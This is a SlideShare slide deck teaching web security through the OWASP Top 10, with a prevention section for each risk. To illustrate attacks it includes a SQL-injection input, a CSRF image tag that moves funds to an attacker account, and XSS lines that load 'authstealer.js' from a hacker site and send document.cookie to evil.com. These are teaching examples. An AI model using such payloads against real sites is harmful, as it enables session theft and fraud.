SlideShare a Scribd company logo

Web security and OWASP

I
Isuru Samaraweera

Web Security and OWASP

Software
1 of 49
Download to read offline
Web Security & OWASP By-Isuru Samaraweera
Agenda • What is web security and why? • Introduction to OWASP • OWASP top 10 • OWASP Security testing tools • General Security testing tools • Q & A
What is web security and why? • Security of websites, web applications and web services. • Emergence of Web 2.0 • Intruders exploits vulnerabilities • Techniques XSS,Sql Injection etc • Attacker profiles • Catastrophic security hacks • Sony Entertainment 2011- 77 million accounts with credit card numbers • JP Morgan chase 2014 -7.6million account information • Master Card- 2005 -40 million accounts • Business risk • Trust issues • Overhead costs • Security checkpoints and techniques • Early stages of development
OWASP(https://www.owasp.org) • The Open Web Application Security Project (OWASP) • Non profit organization, open community • Vulnerabilities, threats, attacks and countermeasures • Development guide • https://www.owasp.org/index.php/Projects/OWASP_Development_Guide • Testing guide • https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf • Code review guide • https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf • Webgoat sample web application • https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project • Mailing lists • https://lists.owasp.org/mailman/listinfo • Newsletter • https://www.owasp.org/index.php/Category:OWASP_Newsletter • Many more…
OWASP top 10 (2017) • Injection • Broken Authentication and Session Management (XSS) • Cross Site Scripting (XSS) • Broken access Control • Security Misconfiguration • Sensitive Data Exposure • Missing Function Level Access Control • Cross Site Request Forgery (CSRF) • Using Components with Known Vulnerabilities • Under protected APIs
(#1)-Injection • Send untrusted data into the system • Text based attacks • External,internal parties • SQL,LDAP,JPQL,Xpath,Nosql • String query = "SELECT * FROM user_data WHERE lastName='" + request.getParameter(“lastName") + "'"; • Query HQLQuery = session.createQuery(“FROM user_data WHERE lastName ='“ + request.getParameter(“lastName") + "'"); • http://example.com/app/userView?lastName=' or '1'='1
Preventing Injection • Avoid dynamic queries • Parameterized queries • PreparedStatement,SQLCommand,PDO • Stored procedures • Input validation • Carefully escape especial characters if no api is available • OWASP Enterprise Security API • ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam ); • Use code analysis tools • https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(#2)-Broken Authentication and Session Management • Custom authentication , Session management with flaws • Credentials not protected with hashing • Insider attacks • Credentials can be guessed • Session id exposed in the url->session fixation • Session id won’t timeout • Session ids are not rotated on success logins • http://website.com/login.php?;jsessionid= 2P0OC2JSNDLPSKHCJUN2JV&d
Protecting the Password • Hashing • Transport • Storage
Crack Password Hash • Dictionary attack • File containing words, phrases, common passwords • Brute-force attack • Tries every possible combination of characters up to a given length. • Look up table • Dictionary in a lookup table data structure • Rainbow table • High performance lookup
User Registration with Salt • App post the username foo@example.com with Password pass • Server generates a random salt r • Server computes h=H(r|pass) • Server stores (foo@example.com,hash,r) in DB
Simplified login flow • App Post username foo@example.com and password Pass • Server lookup the salt using the user id • Server compute the hash h’=H(r|’pass’) • If(foo@example.com,h’) exists in db allow login
Attack on password database
Hashing with key and random salt • Is it safe?
Hashing recipe • Bind password hash value to account • Use application secret • Follow password hashing best practices
Transport Security of a password
Hashing the password on client
Encrypt the password • Asymmetric encryption • Problems?
Preventing broken authentication contd… • Implement Proper Password Strength Controls • Password Length >10<128 • Pasword Complexity • at least 1 uppercase character (A-Z) • at least 1 lowercase character (a-z) • at least 1 digit (0-9) • at least 1 special character (punctuation) — do not forget to treat space as special characters too • Not more than 2 identical characters in a row (e.g., 111 not allowed)
Preventing broken authentication contd.. • Authentication and Error Messages • respond with a generic error message • Incorrect Response Examples • "Login for User foo: invalid password" • "Login failed, invalid user ID" • "Login failed; account disabled" • "Login failed; this user is not active“ • Correct Response example • "Login failed; Invalid userID or password"
Preventing broken authentication contd.. • Prevent brute force attacks • Account lock out • Multifactor authentication • Logging and Monitoring • Use of authentication protocols that require no password • Oauth • OpenId • Saml • Leverage available frameworks and tools • Apache Shiro • Spring security • Owasp esapi • https://www.owasp.org/index.php/Authentication_Cheat_Sheet
Preventing Session Management issues • Secure login over Https • Password submitted encrypted • Immediate redirect to http • Session id sent in clear text-<Vulnerability
Preventing Session Management issues contd.. • User requests HTTP page,response redirects to HTTPS • 302 Response is HTTP Vulnerability point
Preventing Session Management issues contd.. • HSTS –Http Strict Transport Layer security • Opt-in security control • Instructs browser upgrade the security for STS • HSTS forces • All communications over HTTPS • No insecure http requests sent from browser • No option for user to override untrusted certificates
Enabling HSTS • In Apache add below to .htaccess • # Use HTTP Strict Transport Security to force client to use secure connections only Header always set Strict-Transport-Security "max- age=300; includeSubDomains; “ Max-age =>The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS. includeSubDomains=>If this optional parameter is specified, this rule applies to all of the site's subdomains as well. • Can be done in Nginx,IIS etc
Preventing Session Management issues contd.. • HTTP Strict Transport Security (HSTS) • Cookies • Secure • <secure>true</secure> • HttpOnly • <http-only>true</http-only> • Cache-Control: no-cache,no-store • Pragma: no-cache • New session ids on consecutive logins
• https://www.owasp.org/index.php/Session_Management_Cheat_Sheet • https://www.owasp.org/index.php/Authentication_Cheat_Sheet • https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet • https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Testing_for_authentication • https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_ Sheet
(#3)-Cross Site scripting(XSS) • Text-based attack scripts that exploit the interpreter in the browser. • The attacker adds the following comment: • Great price for a great item! Read my review here <script src="http://hackersite.com/authstealer.js"> </script>. • Document.location=http://evil.com?id=document.cookie
Inject malicious HTML
Preventing XSS • Html escape before inserting untrusted data • String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) ); • & --> &amp; • < --> &lt; • > --> &gt; • JavaScript Escape Before Inserting Untrusted Data • <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script> • String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) ); • Css Escape Before Inserting Untrusted Data • <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style> • String safe = ESAPI.encoder().encodeForCss( request.getParameter( "input" ) );
Preventing XSS contd… • URL Escape Before Inserting Untrusted Data • <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a > • String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) ); • XSS Filters-Block requests with dangerous tags,scripts • OWASP antisamy project • HTML and CSS encoding. • https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project • Html sanitizer project • https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project • https://github.com/mganss/HtmlSanitizer • https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Che at_Sheet
(#4)-Broken access Control • Unprivileged function access • http://example.com/app/getappInfo • http://example.com/app/admin_getappInfo • Unauthorized data access • htttp://soomebank.com/showacct?id=101 • http://soomebank.com/showacct?id=102 • Prevention • Access control matrix • Check access • Do not assume that users will be unaware of special or hidden URLs or APIs. • Penetration tests • Regular audits, code reviews, Automated verification • Principle of lease privilege • Principle of defense in depth • https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference • https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
(#5)-Security misconfiguration • Can happen at any level • Web server • App server • Database • Custom code • Out of date software • Unnecessary ports,services • Error message throws stack trace? • Framework settings set to secure value?(struts,spring,.net etc) • Prevention • Frequent audits • Deployment process • Automate configuration validity • https://www.owasp.org/index.php/Configuration • https://www.owasp.org/index.php/Error_Handling • https://www.owasp.org/index.php/Testing_for_configuration_management • https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006) • https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management
(#6)-Sensitive data exposure • Passwords ,credit card numbers etc (transit or rest) • Not encrypting sensitive data • Use weak keys and algorithms to encrypt • SSL not enabled in the entire path • Prevention measures • Encrypt sensitive data accurately • AES-256 • Key encrypting key • Hardware security modules • RSA 2048 • Don’t store sensitive data unnecessarily • Disable caching and auto completion • https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet • https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet • https://www.owasp.org/index.php/Testing_for_SSL-TLS
(#7) -Insufficient Attack Protection • Inability to detect, prevent, and respond to both manual and automated attacks • Attack with OWASP ZAP,SQL map tools(http://sqlmap.org/) • Manual human attack • Detect attacks -> OWASP App sensor • An input a legitimate client can’t generate? • Unusual usage patterns, repeated requests, spikes? • Respond to attacks->OWASP App sensor • Decide whether to automatically block requests, • IP addresses, or IP ranges. • Consider disabling or monitoring misbehaving user accounts. • Patch quickly
Monitor security
• Monitor log files • Monitor network bandwidth
• https://www.owasp.org/index.php/OWASP_AppSensor_Project • https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_A pplications • https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_ Sheet • https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet • https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_R ule_Set_Project • https://www.owasp.org/index.php/Intrusion_Detection
(#8)-Cross Site Request Forgery • Attacker trick the victim with urls • Execute unwanted actions • Compromise the entire application • http://example.com/app/transferFunds?amount=1500&destinationAccou nt=4673243243 • Attacker emails below url to the victim • <img src="http://example.com/app/transferFunds? amount=1500&destinationAccount=attackersAcct#“ width="0" height="0" />
Preventing CSRF • Include unique token in hiddenfield • Verify the token on each request • CSRFGuard • Reauthenticate • https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet • http://lists.owasp.org/pipermail/owasp-csrfguard
(#9)-Using components with known vulnerabilities • Outdated libraries • Apache CXF Authentication Bypass (2012) • Call with no identity token => invoke any web service with full permission • Spring Remote Code Execution(2011/2012) • Expression Language flow=>Execute arbitrary code on the server • Struts2 Remote code execution(2017) • Mishandles file upload • Content-Type header flow=>Execution of arbitrary code on the server
Preventing Using components with known vulnerabilities • Identify all components and dependent libraries • OWASP_Dependency_Check • https://www.owasp.org/index.php/OWASP_Dependency_Check • Retire.js • https://github.com/retirejs/retire.js/ • Monitor security of these components • Mailing lists • Official sites • Security policy on 3rd party libraries • Software development practices to use • Passing security tests • Acceptable licenses • Wrappers to expose only the required function in an api • https://cve.mitre.org/about/ • https://www.owasp.org/index.php/Virtual_Patching_Best_Practices
(#10)- Underprotected APIs • REST, JSON, and XML APIs • Mobile app connecting to remote API(Username,password and accountnum) • Public SMS JSON API->SQL injection • XML XXE • External entity is processed by XML parser • Prevention • Secured communications between the client and your APIs. • Strong authentication scheme for your APIs, • Parser configuration is hardened against attack. • Protect against injection of all forms • https://www.owasp.org/index.php/REST_Security_Cheat_Sheet • https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet
OWASP Testing tools • The OWASP Application Security Verification Standard (ASVS) Project • Test ,web application technical security controls • Requirements for secure development. • Procurement • https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verificatio n_Standard_Project • OWASP live CD project • Best open source security tools into a single bootable environment • Boot from this Live CD or run VM • Access to a full security testing suite • No configuration required • OWASP ZAP • https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
General Security Testing tools • Iron Wasp(https://ironwasp.org/) • Over 25 kinds of web vulnerabilities • Wireshark(https://www.wireshark.org/) • Network packet analyzer. • Google Nogotofail( https://github.com/google/nogotofail) • Known TLS/SSL vulnerabilities and misconfigurations. • SQlMap( http://sqlmap.org/) • Sql Injection • Qualys(https://www.qualys.com)
Security code review • Fastest and accurate • Data Validation • Authentication • Session management • Authorization • Cryptography • Error handling • Logging • Security Configuration • Network Architecture • Tools • Code crawler • Orizon • O2 • FindSecurityBugs
Web security and OWASP

Recommended

OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017Michael Furman
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerCiNPA Security SIG
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 

Recommended

OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017Michael Furman
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerCiNPA Security SIG
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017HackerOne
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveviewShreyas N
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentationAshwini Paranjpe
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017ibrahimumer2
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Anatomy Web Attack
Anatomy Web AttackAnatomy Web Attack
Anatomy Web AttackKelly Speiser
 
Web attacks
Web attacksWeb attacks
Web attackshusnara mohammad
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP CodingNarudom Roongsiriwong, CISSP
 
Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Vasan Ramadoss
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding GuideGeoffrey Vandiest
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 

More Related Content

What's hot

2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017HackerOne
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveviewShreyas N
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security ToolsLalit Kale
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10iphonepentest
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Vasan Ramadoss
 

What's hot (20)

2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveview
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
Application Security Tools
Application Security ToolsApplication Security Tools
Application Security Tools
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & Countermeasures
 
Anatomy Web Attack
Anatomy Web AttackAnatomy Web Attack
Anatomy Web Attack
 
Web attacks
Web attacksWeb attacks
Web attacks
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
Secure Web Applications Ver0.01
Secure Web Applications Ver0.01Secure Web Applications Ver0.01
Secure Web Applications Ver0.01
 

Similar to Web security and OWASP

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationStormpath
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Gareth Davies
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Michael Pirnat
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Stormpath
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsSecuRing
 
Your Web Application Is Most Likely Insecure
Your Web Application Is Most Likely InsecureYour Web Application Is Most Likely Insecure
Your Web Application Is Most Likely InsecureAchievers Tech
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Duo Security
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp
 

Similar to Web security and OWASP (20)

Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
 
Defending web applications v.1.0
Defending web applications v.1.0Defending web applications v.1.0
Defending web applications v.1.0
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 
Owasp & Asp.Net
Owasp & Asp.NetOwasp & Asp.Net
Owasp & Asp.Net
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
 
Your Web Application Is Most Likely Insecure
Your Web Application Is Most Likely InsecureYour Web Application Is Most Likely Insecure
Your Web Application Is Most Likely Insecure
 
Secure all things with CBSecurity 3
Secure all things with CBSecurity 3Secure all things with CBSecurity 3
Secure all things with CBSecurity 3
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysis
 

More from Isuru Samaraweera

Full Text Search in Couchbase
Full Text Search in CouchbaseFull Text Search in Couchbase
Full Text Search in CouchbaseIsuru Samaraweera
 
Exploring Streams and Lambdas in Java8
Exploring Streams and Lambdas in Java8Exploring Streams and Lambdas in Java8
Exploring Streams and Lambdas in Java8Isuru Samaraweera
 
Introductionto fp with groovy
Introductionto fp with groovyIntroductionto fp with groovy
Introductionto fp with groovyIsuru Samaraweera
 

More from Isuru Samaraweera (6)

Full Text Search in Couchbase
Full Text Search in CouchbaseFull Text Search in Couchbase
Full Text Search in Couchbase
 
React Redux AntD and Umi js
React Redux AntD and Umi jsReact Redux AntD and Umi js
React Redux AntD and Umi js
 
Exploring Streams and Lambdas in Java8
Exploring Streams and Lambdas in Java8Exploring Streams and Lambdas in Java8
Exploring Streams and Lambdas in Java8
 
Java8lambda
Java8lambda Java8lambda
Java8lambda
 
Groovy unleashed
Groovy unleashed Groovy unleashed
Groovy unleashed
 
Introductionto fp with groovy
Introductionto fp with groovyIntroductionto fp with groovy
Introductionto fp with groovy
 

Recently uploaded

5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
